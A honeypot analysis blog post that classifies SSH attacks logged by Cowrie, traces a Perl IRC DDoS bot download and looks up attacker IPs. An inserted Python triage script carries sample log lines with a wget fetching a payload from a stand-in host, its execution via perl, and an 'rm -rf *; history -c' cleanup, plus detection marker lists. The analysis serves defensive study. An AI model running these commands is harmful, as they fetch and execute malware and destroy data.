Honeypot Report - T-Pot: Cowrie
INTRODUCTION
Honeypots are great for creating decoys within your network to lure threats into a controlled and safe environment.
For this project, we’ll be analyzing the data generated by my T-Pot honeypot from Telekom Security. This T-Pot is based on a Debian 10 Buster AWS instance and runs multiple honeypots and tools as Docker containers, backed by an ELK (Elasticsearch, Logstash, and Kibana) stack. ***reference: https://www.elastic.co/what-is/elk-stack
I’ve hosted this honeypot in Tokyo, in the AWS Asia Pacific (ap-northeast-1) region.
Though we won’t be going over all the honeypots in the T-Pot, we’ll be specifically focusing on two, Cowrie and ADBHoney, over a 12-hour period. We’ll analyze the data I’ve monitored to identify the attackers and their malware, followed by a bit of OSINT analysis of the attackers’ IP addresses using Spiderfoot with the Shodan, VirusTotal, and AlienVault OTX modules.
SETUP
**Refer to this link for setting up the T-Pot environments: https://pillothecat-hacks.tumblr.com/post/675724421501222912/honeypot-t-pot-setup
OVERVIEW OF COWRIE & ADBHONEY
Cowrie is a medium to high interaction SSH and Telnet honeypot (ports 22 and 23 respectively) for logging brute force attacks and shell interactions. The medium interaction mode (shell) emulates a UNIX system in Python, and in high interaction mode (proxy) it functions as an SSH and Telnet proxy to observe the attacker’s behavior. *** reference: “https://github.com/cowrie/cowrie”
ADBHoney is a low interaction honeypot for Android Debug Bridge over TCP/IP. Android Debug Bridge (ADB) is a protocol for keeping track of emulated and real phones, TVs, and DVRs connected to a given host. Though this protocol is intended for developers to debug or push content to the devices, malicious attackers can use it to run shell commands and execute binaries. ***reference: “https://github.com/huuck/ADBHoney”
COWRIE ATTACK OVERVIEW
The scope of the attacks we will review is a 12-hour period, from Tuesday, February 8, 2022 12:00pm – Wednesday, February 9, 2022 12:00am. We’ll start off with a general overview of the statistics of attackers who executed commands in the Cowrie honeypot.
Setting Cowrie and Command Input Filter
Head over to the “Discover” tab.
Filter the day/time range on the right top corner of the Kibana T-Pot dashboard.
Next, we’ll want to add a filter for Cowrie; click “Add filter”.
Set Field:type and Operator:is – set the Value to “Cowrie”, and save.
Add another filter in the same way as above, except set Field:input.keyword and Operator:exists, and save.
Finally select the following fields on the left hand panel menu shown below:
We’ve filtered our search to view the command line inputs of our attackers on our Cowrie honeypot!
To summarize the information that we’ve filtered, please refer to the table below.
The remainder of the analysis will be categorized by grouping the attackers into colors, based on the type of attack they’ve conducted. For example, we’ll notice that the attacks from Moscow and Beijing and the attacks from Bryansk, Tainan City, Lesenice, and Tadworth are all running similar commands, which strongly suggests that we are seeing a botnet conducting reconnaissance of the network and OS, and even searching for any cryptominers. A more careful analysis and explanation of each command line execution will be found in each individual section. For now, familiarize yourself with the various attackers, where they are coming from, and identify which attack commands resemble each other.
COWRIE - ATTACKER ANALYSIS
Botnet Reconnaissance of MikroTik Devices – Moscow, Russia (1) and Beijing, China (5)
Attacker 1 (37.204.98.9) and Attacker 5 (94.75.149.161) both run a series of commands to perform reconnaissance on the Cowrie honeypot. As explained below, each command enumerates system information: RouterOS, CPU information, network interfaces, etc. The attack also searches the directories of specific services, particularly on MikroTik devices, that are often vulnerable because of how the service communicates with the system.
When researching MikroTik devices, I found some reports on MikroTik devices being vulnerable to VPN malware, and warnings of routers being compromised by Coinhive cryptocurrency malware. This information helps us make more sense of why the botnet was conducting reconnaissance of the system; we’ll notice that each command looks for vulnerabilities well known within MikroTik devices, including searching for any processes named “Miner” in order to infect any crypto mining processes.
Refer to the table below for the specific descriptions of each input.
https://malwaremily.medium.com/honeypot-logs-a-botnets-search-for-mikrotik-routers-48e69e110e52
Botnet Reconnaissance through Busybox – Bryansk, Russia (3); Tainan City, Taiwan (4); Lesenice, Slovakia (6); Tadworth, United Kingdom (7)
With the expansion of technology and the growing number of connected Internet of Things (IoT) devices, more devices may be prone to attacks. However, since malware is compiled for a specific platform, careful reconnaissance is important for an attacker to know which malware to use on the target’s operating system and hardware. Much like the previous attack, this series of commands is run by a bot to enumerate system information.
*** refer to https://www.iij.ad.jp/en/dev/iir/pdf/iir_vol36_focused1_EN.pdf (last page) for more information
We’ll notice that the last command removes the .s file, into which the attacker had copied the echo command in order to perform reconnaissance of the system’s architecture. If the attack had been successful, this command would have been followed by a wget command to download the payload, and a chmod command to mark the file as executable. Fortunately, no payload was identified in any of these attacks. Since the honeypot sent a fake output in response to the reconnaissance efforts (an example is shown below), it is possible that the botnet either did not have the appropriate malware for the fake system, or maybe even recognized that this machine was a honeypot, and therefore ended its attack.
Single Script Reconnaissance – Seoul, South Korea(2)
This reconnaissance script is by far the simplest compared to the two attacks we’ve examined so far. We don’t see any download commands run after this reconnaissance, so like the earlier examples, the attack stopped after its reconnaissance efforts.
Perl Script Payload – Taipei, Taiwan(8)
The very last attack we see from Taipei, Taiwan (211.22.65.18) is my personal favorite since there is a malicious file that was downloaded.
Like the attacker from Seoul, the attacker from Taipei starts with system enumeration using the uname command. But then, it runs wget to download znoki.jpg. Interestingly, the attacker uses Perl to execute the .jpg file. The last two commands show the attacker erasing their footprint by removing all files and clearing the history.
In a separate post, I will be going over a more in-depth malware analysis of this Perl script, setting up a VM to execute the malware and capturing the traffic in Wireshark. For now, we’ll take a high-level overview of what this malware is. First, download the malicious file.
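As an added example (not the author’s T-Pot data or code), here is a small Python triage script that reads Cowrie’s JSON log format (cowrie.command.input events carrying src_ip, session and input fields), groups commands per session, and labels each session by the furthest stage reached in the chain described in the Busybox and Taipei sections above: reconnaissance only, a wget download staged, or a download followed by execution, plus a flag for history clearing. The log lines and IP addresses are constructed for the example.

```python
import json

# Constructed Cowrie-style JSON log lines (example data, not the author's logs).
SAMPLE_LOG = """
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","session":"a1","timestamp":"2022-02-08T12:01:00Z","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","session":"a1","timestamp":"2022-02-08T12:01:02Z","input":"cat /proc/cpuinfo | grep name | wc -l"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","session":"a1","timestamp":"2022-02-08T12:01:04Z","input":"rm .s"}
{"eventid":"cowrie.login.success","src_ip":"192.0.2.20","session":"b2","timestamp":"2022-02-08T13:00:00Z","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.20","session":"b2","timestamp":"2022-02-08T13:00:01Z","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.20","session":"b2","timestamp":"2022-02-08T13:00:03Z","input":"wget http://203.0.113.5/bot.jpg"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.20","session":"b2","timestamp":"2022-02-08T13:00:05Z","input":"perl bot.jpg"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.20","session":"b2","timestamp":"2022-02-08T13:00:07Z","input":"rm -rf *; history -c"}
"""

# Substrings that mark each stage of the attack chain seen in the post.
DOWNLOAD = ("wget ", "curl ", "tftp ")
EXECUTE = ("perl ", "chmod +x", "chmod 777", "sh ", "./")
CLEANUP = ("history -c", "rm -rf", "unset HISTFILE")

def parse_inputs(log_text):
    """Group cowrie.command.input events by session, keeping source IP and commands."""
    sessions = {}
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev.get("eventid") != "cowrie.command.input":
            continue  # login/auth events carry no command input
        s = sessions.setdefault(ev["session"], {"src_ip": ev["src_ip"], "cmds": []})
        s["cmds"].append(ev["input"])
    return sessions

def classify(cmds):
    """Label a session by the furthest stage reached: recon, staged payload, executed payload."""
    def hit(markers):
        return any(m in c for c in cmds for m in markers)
    if hit(DOWNLOAD) and hit(EXECUTE):
        label = "payload-executed"
    elif hit(DOWNLOAD):
        label = "payload-staged"
    else:
        label = "recon-only"
    return label + ("+cleanup" if hit(CLEANUP) else "")

def triage(log_text):
    """Return {session_id: (src_ip, label)} for every session that typed commands."""
    return {sid: (s["src_ip"], classify(s["cmds"])) for sid, s in parse_inputs(log_text).items()}

if __name__ == "__main__":
    for sid, (ip, label) in triage(SAMPLE_LOG).items():
        print(f"{sid} {ip} {label}")
```

The same script can be pointed at a real Cowrie cowrie.json file by reading it into log_text, since it only relies on the eventid, session, src_ip and input fields.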
When we check the file type, we’ll once again confirm that the file is a Perl executable script.
In the header we can see that the malware is a DDoS Perl IrcBot v1.0.
Additionally, we can look up the MD5 hash of the file on VirusTotal. As we’ll see, it seems as though the malware is running bots and creating backdoors to take part in a DDoS attack.
Once again, if you are interested in a more in-depth analysis of this Perl script, refer to this link: https://pillothecat-hacks.tumblr.com/post/675914553459146752/honeypot-report-ddos-perl-ircbot-v10
OSINT ON ATTACKERS
Open Source Intelligence is the process of gathering information about a target through open and public sources. For our analysis, we’ll be mainly using Spiderfoot (which is built into the ELK stack) with the Shodan, VirusTotal, and AlienVault OTX modules.
Set-Up
To add the API keys, go to the Spiderfoot dashboard -> Settings, and search for the respective modules on the left hand panel. ***Shodan, VirusTotal, and AlienVault OTX are all open source tools; you should also be able to make a free account and then find the API keys within their settings/account page.
Now we can scan our targets by going to the “New Scan” tab, adding the respective target’s IP address, and creating a name for the scan.
I will be scanning only two IP addresses from the analysis that we did earlier:
Machine 2 (14.36.38.99) – Seoul, South Korea
And Machine 8 (211.22.65.18) – Taipei, Taiwan
OSINT - Machine 2 (14.36.38.99) – Seoul, South Korea
Here is a general summary of the information gathered from Spiderfoot. We’ll see that Spiderfoot enumerated malicious affiliate IP addresses, open TCP ports, and even the software used.
I’m mainly interested in where the attack is coming from, so we’ll take a look at the Physical Location and Physical Coordinates.
We can also check and verify these coordinates on https://www.gps-coordinates.net (a sample of the Gyeonggi-do location is shown below).
After researching KT Head Office, I am led to believe that it is referring to KT Telecommunications, one of the largest wireless carriers in South Korea. It seems a bit odd that the attack was being sent from here, but it’s quite possible that the command was executed by an infected host with a botnet. It especially makes sense that a botnet targets a telecommunication company for its confidential/sensitive data and wide ranging network.
Just to make sure, we can check the Affiliate – Email Addresses information in Spiderfoot and we’ll see a list of emails with similar data elements that tell us that these emails were associated with DDoS attack. A couple of the tags even tell us that the emails are “bots” and have been blacklisted.
OSINT - Machine 8 (211.22.65.18) – Taipei, Taiwan
The general summary for Machine 8 has almost 7x more elements than that of Machine 2. The Spiderfoot results also pick up a lot more specific information, such as hacked email accounts, affiliate company names, and even DNS SPF records.
Keep in mind that Machine 8 is the attacker who downloaded the DDoS Perl IrcBot v1.0. Unlike the previous case where the suspected botnet from Machine 2 was performing reconnaissance of our honeypot, Machine 8 was infecting our honeypot to become a part of the botnet. Since Machine 8 is doing the infection, it makes sense as to why the Affiliate – Internet Name and the Similar Domain search results are much higher.
Like earlier, we’ll start by finding the physical geolocation of this attacker.
Searching these geolocations, we’ll notice that all are in Taipei: two of them are banks and the third is a non-profit called the American Institute in Taiwan (AIT).
However, when we search Machine 8’s IP address from Talos Intelligence (under the whois tab) we’ll be given a different location and the organization Chunghwa Telecom Co., another very well known Telecommunications company in South-East Asia.
I thought it was interesting how the origin of the attack was from another telecommunications company, and this made me reflect how different organizations and industries might have more relevant assets that attackers will be interested in obtaining. Pretty important to think about!
CLOSING THOUGHTS
After conducting this analysis, we should normally turn our attention to best practices for defending ourselves against such attacks. Granted that for this project we deliberately set our AWS security group’s inbound rule to be open, we can still see how open inbound rules should normally be restricted to trusted users or to hosts on the LAN. We can also consider closing any unused ports, as we saw many attackers gain their initial foothold via SSH and then unload various reconnaissance scripts.
Thank you for reading and learning and growing with me! I’m super excited to continue sharing the results I find from my honeypot! In the next post we’ll take a look at the username and passwords from Cowrie attacks and even examine some attacks and graphs from the ADBHoney pot. And again, here is a post of a deeper analysis on the DDoS Perl IrcBot v1.0 https://pillothecat-hacks.tumblr.com/post/675914553459146752/honeypot-report-ddos-perl-ircbot-v10.
Here is the link for part 2 of this report on ADBHoney: https://pillothecat-hacks.tumblr.com/post/676280043114217472/honeypot-report-t-pot-adbhoney
Until then, keep yourselves secured in the network!